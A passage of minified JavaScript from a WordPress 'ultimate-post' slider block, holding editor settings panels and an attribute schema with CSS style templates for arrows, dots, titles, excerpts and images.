Dimension","ultimate-post")}),store:t,label:__("Arrow Dimension","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.YG,include:(0,a.fA)({title:__("Arrow Style","ultimate-post"),exclude:["separatorStyle",...a.I0],include:[{data:{type:"tag",key:"arrowPos",label:"Arrow Possition",disabled:!0,options:[{value:"left",label:__("Left","ultimate-post")},{value:"right",label:__("Right","ultimate-post")}]}},{data:{type:"range",key:"prevArrowPos",min:1,max:1500,step:1,responsive:!0,label:__("Previous Arrow Position","ultimate-post")}},{data:{type:"range",key:"nextArrowPos",min:1,max:1500,step:1,responsive:!0,label:__("Next Arrow Position","ultimate-post")}}]}),store:t,label:__("Arrow Style","ultimate-post")}));case"dot":return(0,o.createElement)(r.Z,{text:"Dots"},(0,o.createElement)(n.Z,{buttonContent:a.HT,include:(0,a.oc)({include:a.EG,exclude:"__all",title:__("Dots Dimension","ultimate-post")}),store:t,label:__("Dots Dimension","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.YG,include:(0,a.oc)({title:__("Dots Settings","ultimate-post"),exclude:["separatorStyle",...a.EG]}),store:t,label:__("Dots Settings","ultimate-post")}));case"title":return(0,o.createElement)(r.Z,{text:"Title"},(0,o.createElement)(a.sT,{store:t,attrKey:"titleTypo",label:__("Title Typography","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.gA,include:(0,a.Wf)({include:["titleColor","titleHoverColor","titleBackground"],exclude:"__all",title:__("Title Color","ultimate-post")}),store:t,label:__("Title Color","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.HU,include:(0,a.Wf)({exclude:["titleBackground","titleTypo","titleColor","titleHoverColor"],title:__("Title Settings","ultimate-post")}),store:t,label:__("Title Settings","ultimate-post")}));case"excerpt":return(0,o.createElement)(r.Z,{text:"Excerpt"},(0,o.createElement)(a.sT,{store:t,attrKey:"excerptTypo",label:__("Excerpt Typography","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.gA,include:(0,a.BO)({include:["excerptColor"],exclude:"__all",title:__("Excerpt Color","ultimate-post")}),store:t,label:__("Excerpt Color","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.HU,include:(0,a.BO)({exclude:["excerptTypo","excerptColor"],title:__("Excerpt Settings","ultimate-post")}),store:t,label:__("Excerpt Settings","ultimate-post")}));case"meta":return(0,o.createElement)(r.Z,{text:"Meta"},(0,o.createElement)(a.sT,{store:t,attrKey:"metaTypo",label:__("Meta Typography","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.HT,include:(0,a.cr)({include:["metaSpacing","metaMargin","metaPadding"],exclude:"__all",title:__("Meta Spacing","ultimate-post")}),store:t,label:__("Meta Spacing","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.Cz,include:(0,a.cr)({include:a._y,exclude:"__all",title:__("Meta Texts","ultimate-post")}),store:t,label:__("Meta Texts","ultimate-post")}),(0,o.createElement)(a.b0,{store:t,settingsTitle:__("Meta Settings","ultimate-post"),styleTitle:__("Meta Style","ultimate-post"),settingsKeys:a.G7,styleKeys:a.hd,oArgs:a.jK,exSettings:["metaListSmall"],exStyle:["metaTypo","metaMargin","metaPadding","metaSpacing"]}));case"read-more":return(0,o.createElement)(r.Z,{text:"Read More"},(0,o.createElement)(a.sT,{store:t,attrKey:"readMoreTypo",label:__("Read More Typography","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.HT,include:(0,a.NJ)({include:["readMoreSacing","readMorePadding"],exclude:"__all",title:__("Read More Spacing","ultimate-post")}),store:t,label:__("Read More Spacing","ultimate-post")}),(0,o.createElement)(a.b0,{store:t,settingsTitle:__("Read More Settings","ultimate-post"),styleTitle:__("Read More Style","ultimate-post"),settingsKeys:a.qM,styleKeys:a.ad,oArgs:a.e5,exStyle:["readMoreTypo","readMoreSacing","readMorePadding"]}));case"cat":return(0,o.createElement)(r.Z,{text:"Taxonomy/Category"},(0,o.createElement)(a.sT,{store:t,attrKey:"catTypo",label:__("Category Typography","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.HT,include:(0,a.v9)({include:["catSacing","catPadding"],exclude:"__all",title:__("Category Spacing","ultimate-post")}),store:t,label:__("Category Spacing","ultimate-post")}),(0,o.createElement)(a.b0,{store:t,settingsTitle:__("Category Settings","ultimate-post"),styleTitle:__("Category Style","ultimate-post"),settingsKeys:a.eC,styleKeys:a.EK,oArgs:a.op,exSettings:["catPosition"],exStyle:["catTypo","catSacing","catPadding"]}));case"image":return(0,o.createElement)(r.Z,{text:"Image"},(0,o.createElement)(a.b0,{store:t,settingsTitle:__("Image Settings","ultimate-post"),styleTitle:__("Image Style","ultimate-post"),settingsKeys:a.pj,styleKeys:a.hH,oArgs:a.Po,exSettings:["imageScale","imgMargin","imgSeparator","imgCropSmall","imgAnimation"],exStyle:["imageScale","imgMargin","imgSeparator","imgCropSmall","imgAnimation"],incStyle:[{position:0,data:{type:"range",key:"imgBgBlur",min:0,max:20,step:.5,responsive:!1,label:__("Background Blur","ultimate-post")}},{position:1,data:{type:"range",key:"imgBgbrightness",min:0,max:50,step:.5,responsive:!1,label:__("Background brightness","ultimate-post")}}],incSettings:[{data:{type:"toggle",key:"fallbackEnable",label:__("Fallback Image Enable","ultimate-post")}},{data:{type:"media",key:"fallbackImg",label:__("Fallback Image","ultimate-post")}}]}));default:return null}}},22105:(e,t,l)=>{"use strict";l.d(t,{Z:()=>n});var o=l(92165),a=l(73151),i=l(51579);const n={blockPubDate:{type:"string",default:"empty"},blockId:{type:"string",default:""},previewImg:{type:"string",default:""},currentPostId:{type:"string",default:""},slidesToShow:{type:"object",default:{lg:"1",sm:"1",xs:"1"},style:[{depends:[{key:"fade",condition:"!=",value:!0},{key:"layout",condition:"==",value:"slide2"}]},{depends:[{key:"layout",condition:"==",value:"slide3"}]}]},autoPlay:{type:"boolean",default:!0},height:{type:"object",default:{lg:"550",unit:"px"},style:[{selector:"{{ULTP}} .ultp-block-slider-wrap { height: {{height}}; }"}]},slidesCenterPadding:{type:"object",default:{lg:"160",sm:"100",xs:"50"},style:[{depends:[{key:"layout",condition:"!=",value:"slide2"},{key:"layout",condition:"!=",value:"slide3"},{key:"layout",condition:"!=",value:"slide5"},{key:"layout",condition:"!=",value:"slide6"},{key:"layout",condition:"!=",value:"slide8"}]}]},slidesTopPadding:{type:"string",default:"0",style:[{depends:[{key:"layout",condition:"!=",value:"slide1"},{key:"layout",condition:"!=",value:"slide2"},{key:"layout",condition:"!=",value:"slide3"},{key:"layout",condition:"!=",value:"slide5"},{key:"layout",condition:"!=",value:"slide6"},{key:"layout",condition:"!=",value:"slide8"}],selector:"{{ULTP}} .ultp-block-items-wrap .slick-list { padding-top: {{slidesTopPadding}}px !important; padding-bottom: {{slidesTopPadding}}px !important; }"}]},allItemScale:{type:"object",default:{lg:".9"},style:[{depends:[{key:"layout",condition:"==",value:"slide4"}],selector:"{{ULTP}} .slick-slide { transition: .3s; transform: scale({{allItemScale}}) }"},{depends:[{key:"layout",condition:"==",value:"slide7"}],selector:"{{ULTP}} .slick-slide { transition: .3s; transform: scale({{allItemScale}}) }"}]},centerItemScale:{type:"object",default:{lg:"1.12"},style:[{depends:[{key:"layout",condition:"==",value:"slide4"}],selector:"{{ULTP}} .slick-center { transition: .3s; transform: scale({{centerItemScale}}) !important; }"},{depends:[{key:"layout",condition:"==",value:"slide7"}],selector:"{{ULTP}} .slick-center { transition: .3s; transform: scale({{centerItemScale}}) !important; }"}]},slideSpeed:{type:"string",default:"3000",style:[{depends:[{key:"autoPlay",condition:"==",value:!0}]}]},sliderGap:{type:"string",default:"",style:[{depends:[{key:"layout",condition:"!=",value:"slide2"}],selector:"{{ULTP}} .ultp-block-items-wrap .slick-slide > div { padding: 0 {{sliderGap}}px; }\n          {{ULTP}} .ultp-block-items-wrap .slick-list{ margin: 0 -{{sliderGap}}px; }"}]},dots:{type:"boolean",default:!0},arrows:{type:"boolean",default:!0},preLoader:{type:"boolean",default:!1},fade:{type:"boolean",default:!1,style:[{depends:[{key:"layout",condition:"==",value:"slide2"}]},{depends:[{key:"layout",condition:"==",value:"slide5"}]},{depends:[{key:"layout",condition:"==",value:"slide6"}]},{depends:[{key:"layout",condition:"==",value:"slide8"}]}]},headingShow:{type:"boolean",default:!1},excerptShow:{type:"boolean",default:!1},contentTag:{type:"string",default:"div"},openInTab:{type:"boolean",default:!1},notFoundMessage:{type:"string",default:"No Post Found"},layout:{type:"string",default:"slide1"},titleShow:{type:"boolean",default:!0},titleStyle:{type:"string",default:"none"},titleTag:{type:"string",default:"h3"},titlePosition:{type:"boolean",default:!0},titleColor:{type:"string",default:"#fff",style:[{depends:[{key:"titleShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-items-wrap .ultp-block-item .ultp-block-title a { color:{{titleColor}} !important; }"}]},titleHoverColor:{type:"string",default:"rgba(107,107,107,1)",style:[{depends:[{key:"titleShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-items-wrap .ultp-block-item .ultp-block-title a:hover { color:{{titleHoverColor}} !important; }"}]},titleTypo:{type:"object",default:{openTypography:1,size:{lg:"24",unit:"px"},height:{lg:"36",unit:"px"},decoration:"none",family:"",weight:"300",transform:"uppercase"},style:[{depends:[{key:"titleShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-item .ultp-block-content .ultp-block-title, \n          {{ULTP}} .ultp-block-item .ultp-block-content .ultp-block-title a"}]},titlePadding:{type:"object",default:{lg:{top:0,bottom:0,unit:"px"}},style:[{depends:[{key:"titleShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-title { padding:{{titlePadding}}; }"}]},titleLength:{type:"string",default:0},titleBackground:{type:"string",default:"",style:[{depends:[{key:"titleShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-title a { padding: 2px 7px; -webkit-box-decoration-break: clone; box-decoration-break: clone; background-color:{{titleBackground}}; }"}]},titleAnimColor:{type:"string",default:"black",style:[{depends:[{key:"titleStyle",condition:"==",value:"style1"}],selector:"{{ULTP}} .ultp-title-style1 a {  cursor: pointer; text-decoration: none; display: inline; padding-bottom: 2px; transition: all 0.35s linear !important; background: linear-gradient( to bottom, {{titleAnimColor}} 0%, {{titleAnimColor}} 98% );  background-size: 0px 2px; background-repeat: no-repeat; background-position: left 100%; }"},{depends:[{key:"titleStyle",condition:"==",value:"style2"}],selector:"{{ULTP}} .ultp-title-style2 a:hover {  border-bottom:none; padding-bottom: 2px; background-position:0 100%; background-repeat: repeat; background-image: url(\"data:image/svg+xml;charset=utf8,%3Csvg id='squiggle-link' xmlns='http://www.w3.org/2000/svg' xmlns:xlink='http://www.w3.org/1999/xlink' xmlns:ev='http://www.w3.org/2001/xml-events' viewBox='0 0 10 18'%3E%3Cstyle type='text/css'%3E.squiggle%7Banimation:shift .5s linear infinite;%7D@keyframes shift %7Bfrom %7Btransform:translateX(-10px);%7Dto %7Btransform:translateX(0);%7D%7D%3C/style%3E%3Cpath fill='none' stroke='{{titleAnimColor}}' stroke-width='1' class='squiggle' d='M0,17.5 c 2.5,0,2.5,-1.5,5,-1.5 s 2.5,1.5,5,1.5 c 2.5,0,2.5,-1.5,5,-1.5 s 2.5,1.5,5,1.5' /%3E%3C/svg%3E\"); }"},{depends:[{key:"titleStyle",condition:"==",value:"style3"}],selector:"{{ULTP}} .ultp-title-style3 a {  text-decoration: none; $thetransition: all 1s cubic-bezier(1,.25,0,.75) 0s; position: relative; transition: all 0.35s ease-out; padding-bottom: 3px; border-bottom:none; padding-bottom: 2px; background-position:0 100%; background-repeat: repeat; background-image: url(\"data:image/svg+xml;charset=utf8,%3Csvg id='squiggle-link' xmlns='http://www.w3.org/2000/svg' xmlns:xlink='http://www.w3.org/1999/xlink' xmlns:ev='http://www.w3.org/2001/xml-events' viewBox='0 0 10 18'%3E%3Cstyle type='text/css'%3E.squiggle%7Banimation:shift .5s linear infinite;%7D@keyframes shift %7Bfrom %7Btransform:translateX(-10px);%7Dto %7Btransform:translateX(0);%7D%7D%3C/style%3E%3Cpath fill='none' stroke='{{titleAnimColor}}' stroke-width='1' class='squiggle' d='M0,17.5 c 2.5,0,2.5,-1.5,5,-1.5 s 2.5,1.5,5,1.5 c 2.5,0,2.5,-1.5,5,-1.5 s 2.5,1.5,5,1.5' /%3E%3C/svg%3E\"); }"},{depends:[{key:"titleStyle",condition:"==",value:"style4"}],selector:"{{ULTP}} .ultp-title-style4 a { cursor: pointer; font-weight: 600; text-decoration: none; display: inline; padding-bottom: 2px; transition: all 0.3s linear !important; background: linear-gradient( to bottom, {{titleAnimColor}} 0%, {{titleAnimColor}} 98% );  background-size: 100% 2px; background-repeat: no-repeat; background-position: left 100%; }"},{depends:[{key:"titleStyle",condition:"==",value:"style5"}],selector:"{{ULTP}} .ultp-title-style5 a:hover { text-decoration: none; transition: all 0.35s ease-out; border-bottom:none; padding-bottom: 2px; background-position:0 100%; background-repeat: repeat; background-size:auto; background-image: url(\"data:image/svg+xml;charset=utf8,%3Csvg id='squiggle-link' xmlns='http://www.w3.org/2000/svg' xmlns:xlink='http://www.w3.org/1999/xlink' xmlns:ev='http://www.w3.org/2001/xml-events' viewBox='0 0 10 18'%3E%3Cstyle type='text/css'%3E.squiggle%7Banimation:shift .5s linear infinite;%7D@keyframes shift %7Bfrom %7Btransform:translateX(-10px);%7Dto %7Btransform:translateX(0);%7D%7D%3C/style%3E%3Cpath fill='none' stroke='{{titleAnimColor}}' stroke-width='1' class='squiggle' d='M0,17.5 c 2.5,0,2.5,-1.5,5,-1.5 s 2.5,1.5,5,1.5 c 2.5,0,2.5,-1.5,5,-1.5 s 2.5,1.5,5,1.5' /%3E%3C/svg%3E\"); } "},{depends:[{key:"titleStyle",condition:"==",value:"style5"}],selector:"{{ULTP}} .ultp-title-style5 a { cursor: pointer; text-decoration: none; display: inline; padding-bottom: 2px; transition: all 0.3s linear !important; background: linear-gradient( to bottom, {{titleAnimColor}} 0%, {{titleAnimColor}} 98% );  background-size: 100% 2px; background-repeat: no-repeat; background-position: left 100%; }"},{depends:[{key:"titleStyle",condition:"==",value:"style6"}],selector:"{{ULTP}} .ultp-title-style6 a { background-image: linear-gradient(120deg, {{titleAnimColor}} 0%, {{titleAnimColor}} 100%); background-repeat: no-repeat; background-size: 100% 2px; background-position: 0 88%; transition: background-size 0.15s ease-in; padding: 5px 5px; }"},{depends:[{key:"titleStyle",condition:"==",value:"style7"}],selector:"{{ULTP}} .ultp-title-style7 a { cursor: pointer; text-decoration: none; display: inline; padding-bottom: 2px; transition: all 0.3s linear !important; background: linear-gradient( to bottom, {{titleAnimColor}} 0%, {{titleAnimColor}} 98% );  background-size: 0px 2px; background-repeat: no-repeat; background-position: right 100%; } "},{depends:[{key:"titleStyle",condition:"==",value:"style8"}],selector:"{{ULTP}} .ultp-title-style8 a { cursor: pointer; text-decoration: none; display: inline; padding-bottom: 2px; transition: all 0.3s linear !important; background: linear-gradient( to bottom, {{titleAnimColor}} 0%, {{titleAnimColor}} 98% );  background-size: 0px 2px; background-repeat: no-repeat; background-position: center 100%; } "},{depends:[{key:"titleStyle",condition:"==",value:"style9"}],selector:"{{ULTP}} .ultp-title-style9 a { background-image: linear-gradient(120deg,{{titleAnimColor}} 0%, {{titleAnimColor}} 100%); background-repeat: no-repeat; background-size: 100% 10px; background-position: 0 88%; transition: 0.3s ease-in; padding: 3px 5px; }"}]},imageShow:{type:"boolean",default:!0},imgCrop:{type:"string",default:"full"},imgOverlay:{type:"boolean",default:!1},imgBgbrightness:{type:"string",default:"",style:[{selector:"{{ULTP}} .ultp-block-image { filter: brightness({{imgBgbrightness}}); }"}]},imgBgBlur:{type:"string",default:"",style:[{selector:"{{ULTP}} .ultp-block-image > a { filter: blur({{imgBgBlur}}px);}"}]},imgOverlayType:{type:"string",default:"default",style:[{depends:[{key:"imgOverlay",condition:"==",value:!0}]}]},overlayColor:{type:"object",default:{openColor:1,type:"color",color:"#0e1523"},style:[{depends:[{key:"imgOverlayType",condition:"==",value:"custom"}],selector:"{{ULTP}} .ultp-block-image-custom > a::before"}]},imgOpacity:{type:"string",default:.7,style:[{depends:[{key:"imgOverlayType",condition:"==",value:"custom"}],selector:"{{ULTP}} .ultp-block-image-custom > a::before { opacity: {{imgOpacity}}; }"}]},imgHeight:{type:"object",default:{lg:""},style:[{depends:[{key:"layout",condition:"==",value:"slide3"}],selector:"{{ULTP}} .ultp-block-slider-wrap > .ultp-block-image-inner { height:{{imgHeight}} !important; }"},{depends:[{key:"layout",condition:"==",value:"slide6"}],selector:"{{ULTP}} .ultp-block-slider-wrap > .ultp-block-image-inner { height:{{imgHeight}} !important; }"}]},imgWidth:{type:"object",default:{lg:"",unit:"%"},style:[{depends:[{key:"layout",condition:"==",value:"slide2"}],selector:"{{ULTP}} .ultp-block-slider-wrap > .ultp-block-image-inner { width:{{imgWidth}} !important; }"},{depends:[{key:"layout",condition:"==",value:"slide7"}],selector:"{{ULTP}} .ultp-block-slider-wrap > .ultp-block-image-inner { width:{{imgWidth}} !important; }"},{depends:[{key:"layout",condition:"==",value:"slide6"}],selector:"{{ULTP}} .ultp-block-slider-wrap > .ultp-block-image-inner { width:{{imgWidth}} !important; }"}]},imgGrayScale:{type:"object",default:{lg:"0",ulg:"%",unit:"%"},style:[{selector:"{{ULTP}} .ultp-block-image img { filter: grayscale({{imgGrayScale}}); }"}]},imgHoverGrayScale:{type:"object",default:{lg:"0",unit:"%"},style:[{selector:"{{ULTP}} .ultp-block-item:hover .ultp-block-image img { filter: grayscale({{imgHoverGrayScale}}); }"}]},imgRadius:{type:"object",default:{lg:"",unit:"px"},style:[{selector:"{{ULTP}} .ultp-block-image { border-radius:{{imgRadius}}; }"}]},imgHoverRadius:{type:"object",default:{lg:"",unit:"px"},style:[{selector:"{{ULTP}} .ultp-block-item:hover .ultp-block-image { border-radius:{{imgHoverRadius}}; }"}]},imgShadow:{type:"object",default:{openShadow:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4"},style:[{selector:"{{ULTP}} .ultp-block-image"}]},imgHoverShadow:{type:"object",default:{openShadow:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4"},style:[{selector:"{{ULTP}} .ultp-block-item:hover .ultp-block-image"}]},fallbackEnable:{type:"boolean",default:!0},fallbackImg:{type:"object",default:"",style:[{depends:[{key:"fallbackEnable",condition:"==",value:!0}]}]},imgSrcset:{type:"boolean",default:!1},imgLazy:{type:"boolean",default:!1},showSeoMeta:{type:"boolean",default:!1},showFullExcerpt:{type:"boolean",default:!1,style:[{depends:[{key:"showSeoMeta",condition:"==",value:!1}]}]},excerptLimit:{type:"string",default:40,style:[{depends:[{key:"showFullExcerpt",condition:"==",value:!1}]}]},excerptColor:{type:"string",default:"#fff8",style:[{depends:[{key:"excerptShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-excerpt, \n        {{ULTP}} .ultp-block-excerpt p { color:{{excerptColor}}; }"}]},excerptTypo:{type:"object",default:{openTypography:1,size:{lg:14,unit:"px"},height:{lg:26,unit:"px"},decoration:"none",family:""},style:[{depends:[{key:"excerptShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-excerpt, \n          {{ULTP}} .ultp-block-excerpt p"}]},excerptPadding:{type:"object",default:{lg:{top:10,bottom:"",unit:"px"}},style:[{depends:[{key:"excerptShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-excerpt{ padding: {{excerptPadding}}; }"}]},arrowStyle:{type:"string",default:"leftAngle2#rightAngle2",style:[{depends:[{key:"arrows",condition:"==",value:!0}]}]},arrowSize:{type:"object",default:{lg:"80",unit:"px"},style:[{depends:[{key:"arrows",condition:"==",value:!0}],selector:"{{ULTP}} .slick-next svg, \n          {{ULTP}} .slick-prev svg { width:{{arrowSize}}; }"}]},arrowWidth:{type:"object",default:{lg:"60",unit:"px"},style:[{depends:[{key:"arrows",condition:"==",value:!0}],selector:"{{ULTP}} .slick-arrow { width:{{arrowWidth}}; }"}]},arrowHeight:{type:"object",default:{lg:"60",unit:"px"},style:[{depends:[{key:"arrows",condition:"==",value:!0}],selector:"{{ULTP}} .slick-arrow { height:{{arrowHeight}}; } \n          {{ULTP}} .slick-arrow { line-height:{{arrowHeight}}; }"}]},arrowSpaceBetween:{type:"boolean",default:!1,style:[{depends:[{key:"layout",condition:"==",value:"slide6"}]},{depends:[{key:"layout",condition:"==",value:"slide5"}]},{depends:[{key:"layout",condition:"==",value:"slide8"}]}]},arrowPosBetween:{type:"object",default:{lg:"45",sm:"16",xs:"0",unit:"px"},style:[{depends:[{key:"arrows",condition:"==",value:!0},{key:"layout",condition:"==",value:"slide6"},{key:"arrowSpaceBetween",condition:"==",value:!0}],selector:"{{ULTP}} .slick-next { right:{{arrowPosBetween}}; } \n          {{ULTP}} .slick-prev { left:{{arrowPosBetween}}; }"},{depends:[{key:"arrows",condition:"==",value:!0},{key:"layout",condition:"==",value:"slide5"},{key:"arrowSpaceBetween",condition:"==",value:!0}],selector:"{{ULTP}} .slick-next { right:{{arrowPosBetween}}; } \n          {{ULTP}} .slick-prev { left:{{arrowPosBetween}}; }"},{depends:[{key:"arrows",condition:"==",value:!0},{key:"layout",condition:"==",value:"slide8"},{key:"arrowSpaceBetween",condition:"==",value:!0}],selector:"{{ULTP}} .slick-next { right:{{arrowPosBetween}}; } \n          {{ULTP}} .slick-prev { left:{{arrowPosBetween}}; }"}]},arrowPos:{type:"string",default:"left",style:[{depends:[{key:"layout",condition:"==",value:"slide6"},{key:"arrows",condition:"==",value:!0},{key:"arrowSpaceBetween",condition:"==",value:!1}]},{depends:[{key:"layout",condition:"==",value:"slide5"},{key:"arrows",condition:"==",value:!0},{key:"arrowSpaceBetween",condition:"==",value:!1}]},{depends:[{key:"layout",condition:"==",value:"slide8"},{key:"arrows",condition:"==",value:!0},{key:"arrowSpaceBetween",condition:"==",value:!1}]}]},arrowVartical:{type:"object",default:{lg:"45",sm:"16",xs:"0",unit:"px"},style:[{depends:[{key:"arrowSpaceBetween",condition:"==",value:!1},{key:"arrows",condition:"==",value:!0},{key:"layout",condition:"!=",value:"slide5"},{key:"layout",condition:"!=",value:"slide8"},{key:"layout",condition:"!=",value:"slide6"}],selector:"{{ULTP}} .slick-next { right:{{arrowVartical}}; } \n          {{ULTP}} .slick-prev { left:{{arrowVartical}}; }"},{depends:[{key:"arrowSpaceBetween",condition:"==",value:!0},{key:"arrows",condition:"==",value:!0},{key:"layout",condition:"!=",value:"slide5"},{key:"layout",condition:"!=",value:"slide8"},{key:"layout",condition:"!=",value:"slide6"}],selector:"{{ULTP}} .slick-next { right:{{arrowVartical}}; } \n          {{ULTP}} .slick-prev { left:{{arrowVartical}}; }"},{depends:[{key:"arrows",condition:"==",value:!0},{key:"layout",condition:"==",value:"slide5"}],selector:"{{ULTP}} .slick-next { top:{{arrowVartical}}; } \n          {{ULTP}} .slick-prev { top:{{arrowVartical}}; }"},{depends:[{key:"arrows",condition:"==",value:!0},{key:"layout",condition:"==",value:"slide6"}],selector:"{{ULTP}} .slick-next { top:{{arrowVartical}}; } \n          {{ULTP}} .slick-prev { top:{{arrowVartical}}; }"},{depends:[{key:"arrows",condition:"==",value:!0},{key:"layout",condition:"==",value:"slide7"}],selector:"{{ULTP}} .slick-next { top:{{arrowVartical}}; } \n          {{ULTP}} .slick-prev { top:{{arrowVartical}}; }"},{depends:[{key:"arrows",condition:"==",value:!0},{key:"layout",condition:"==",value:"slide8"}],selector:"{{ULTP}} .slick-next { top:{{arrowVartical}}; } \n          {{ULTP}} .slick-prev { top:{{arrowVartical}}; }"}]},prevArrowPos:{type:"object",default:{lg:"",unit:"px"},style:[{depends:[{key:"arrowSpaceBetween",condition:"==",value:!1},{key:"layout",condition:"==",value:"slide5"},{key:"arrowPos",condition:"==",value:"right"}],selector:"{{ULTP}} .slick-prev { left: unset !important; right: {{prevArrowPos}} !important; }"},{depends:[{key:"arrowSpaceBetween",condition:"==",value:!1},{key:"layout",condition:"==",value:"slide6"},{key:"arrowPos",condition:"==",value:"right"}],selector:"{{ULTP}} .slick-prev { left: unset !important; right: {{prevArrowPos}} !important; }"},{depends:[{key:"arrowSpaceBetween",condition:"==",value:!1},{key:"layout",condition:"==",value:"slide8"},{key:"arrowPos",condition:"==",value:"right"}],selector:"{{ULTP}} .slick-prev { left: unset !important; right: {{prevArrowPos}} !important; }"},{depends:[{key:"layout",condition:"==",value:"slide7"}],selector:"{{ULTP}} .slick-prev { right: unset !important; left: {{prevArrowPos}} !important; }"},{depends:[{key:"layout",condition:"==",value:"slide7"}],selector:"{{ULTP}} .slick-prev { right: unset !important; left: {{prevArrowPos}} !important; }"},{depends:[{key:"layout",condition:"==",value:"slide5"},{key:"arrowPos",condition:"==",value:"left"},{key:"arrowSpaceBetween",condition:"==",value:!1}],selector:"{{ULTP}} .slick-prev { right: unset !important; left: {{prevArrowPos}} !important; }"},{depends:[{key:"layout",condition:"==",value:"slide6"},{key:"arrowPos",condition:"==",value:"left"},{key:"arrowSpaceBetween",condition:"==",value:!1}],selector:"{{ULTP}} .slick-prev { right: unset !important; left: {{prevArrowPos}} !important; }"},{depends:[{key:"layout",condition:"==",value:"slide8"},{key:"arrowPos",condition:"==",value:"left"},{key:"arrowSpaceBetween",condition:"==",value:!1}],selector:"{{ULTP}} .slick-prev { right: unset !important; left: {{prevArrowPos}} !important; }"}]},nextArrowPos:{type:"object",default:{lg:"60",unit:"px"},style:[{depends:[{key:"arrowSpaceBetween",condition:"==",value:!1},{key:"layout",condition:"==",value:"slide5"},{key:"arrowPos",condition:"==",value:"right"}],selector:"{{ULTP}} .slick-next { left: unset !important; right: {{nextArrowPos}} !important; }"},{depends:[{key:"arrowSpaceBetween",condition:"==",value:!1},{key:"layout",condition:"==",value:"slide6"},{key:"arrowPos",condition:"==",value:"right"}],selector:"{{ULTP}} .slick-next { left: unset !important; right: {{nextArrowPos}} !important; }"},{depends:[{key:"arrowSpaceBetween",condition:"==",value:!1},{key:"layout",condition:"==",value:"slide8"},{key:"arrowPos",condition:"==",value:"right"}],selector:"{{ULTP}} .slick-next { left: unset !important; right: {{nextArrowPos}} !important; }"},{depends:[{key:"layout",condition:"==",value:"slide7"}],selector:"{{ULTP}} .slick-next { left: unset !important; right: {{nextArrowPos}} !important; }"},{depends:[{key:"arrowSpaceBetween",condition:"==",value:!1},{key:"layout",condition:"==",value:"slide5"},{key:"arrowPos",condition:"==",value:"left"}],selector:"{{ULTP}} .slick-next { right: unset !important; left: {{nextArrowPos}} !important; }"},{depends:[{key:"arrowSpaceBetween",condition:"==",value:!1},{key:"layout",condition:"==",value:"slide6"},{key:"arrowPos",condition:"==",value:"left"}],selector:"{{ULTP}} .slick-next { right: unset !important; left: {{nextArrowPos}} !important; }"},{depends:[{key:"arrowSpaceBetween",condition:"==",value:!1},{key:"layout",condition:"==",value:"slide8"},{key:"arrowPos",condition:"==",value:"left"}],selector:"{{ULTP}} .slick-next { right: unset !important; left: {{nextArrowPos}} !important; }"}]},arrowColor:{type:"string",default:"#000",style:[{depends:[{key:"arrows",condition:"==",value:!0}],selector:"{{ULTP}} .slick-arrow:before { color:{{arrowColor}}; }\n          {{ULTP}} .slick-arrow svg { color:{{arrowColor}}; }"}]},arrowHoverColor:{type:"string",default:"#000",style:[{depends:[{key:"arrows",condition:"==",value:!0}],selector:"{{ULTP}} .slick-arrow:hover:before { color:{{arrowHoverColor}}; } \n          {{ULTP}} .slick-arrow:hover svg { color:{{arrowHoverColor}}; }"}]},arrowBg:{type:"string",default:"",style:[{depends:[{key:"arrows",condition:"==",value:!0}],selector:"{{ULTP}} .slick-arrow { background:{{arrowBg}}; }"}]},arrowHoverBg:{type:"string",default:"",style:[{depends:[{key:"arrows",condition:"==",value:!0}],selector:"{{ULTP}} .slick-arrow:hover { background:{{arrowHoverBg}}; }"}]},arrowBorder:{type:"object",default:{openBorder:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4",type:"solid"},style:[{depends:[{key:"arrows",condition:"==",value:!0}],selector:"{{ULTP}} .slick-arrow"}]},arrowHoverBorder:{type:"object",default:{openBorder:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4",type:"solid"},style:[{depends:[{key:"arrows",condition:"==",value:!0}],selector:"{{ULTP}} .slick-arrow:hover"}]},arrowRadius:{type:"object",default:{lg:{top:"0",bottom:"50",left:"50",right:"50",unit:"px"}},style:[{depends:[{key:"arrows",condition:"==",value:!0}],selector:"{{ULTP}} .slick-arrow { border-radius: {{arrowRadius}}; }"}]},arrowHoverRadius:{type:"object",default:{lg:{top:"50",bottom:"50",left:"50",right:"50",unit:"px"}},style:[{depends:[{key:"arrows",condition:"==",value:!0}],selector:"{{ULTP}} .slick-arrow:hover{ border-radius: {{arrowHoverRadius}}; }"}]},arrowShadow:{type:"object",default:{openShadow:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4"},style:[{depends:[{key:"arrows",condition:"==",value:!0}],selector:"{{ULTP}} .slick-arrow"}]},arrowHoverShadow:{type:"object",default:{openShadow:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4"},style:[{depends:[{key:"arrows",condition:"==",value:!0}],selector:"{{ULTP}} .slick-arrow:hover"}]},dotWidth:{type:"object",default:{lg:"5",unit:"px"},style:[{depends:[{key:"dots",condition:"==",value:!0}],selector:"{{ULTP}} .slick-dots li button { width:{{dotWidth}}; }"}]},dotHeight:{type:"object",default:{lg:"5",unit:"px"},style:[{depends:[{key:"dots",condition:"==",value:!0}],selector:"{{ULTP}} .slick-dots li button { height:{{dotHeight}}; 